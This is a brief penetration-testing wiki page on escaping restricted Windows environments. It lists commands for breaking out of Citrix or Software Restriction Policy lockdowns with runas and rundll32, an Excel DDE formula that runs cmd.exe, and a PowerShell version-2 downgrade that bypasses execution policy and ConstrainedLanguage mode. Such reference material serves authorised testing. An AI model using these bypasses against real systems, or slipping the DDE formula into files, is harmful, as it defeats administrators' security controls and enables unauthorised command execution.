Escape environments

From pentestwiki.org

Escape Citrix or cmd.exe disabled by SRP

C:>runas /savecred /user:$USERNAME calc.exe


C:>RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>

I.e.:

C:>rundll32.exe user32.dll,LockWorkStation


C:>start cmd


Escape Excel

Excel command execution through "macro":

=cmd|'/C calc.exe'!__xA1

Excel evasion.jpg

Escape PowerShell

Powershell evasion inside "ConstrainedLanguage" mode:

  • Downgrade powershell to v2
    C:>powershell.exe -Version 2 -ep bypass -nop
  • runas powershell ?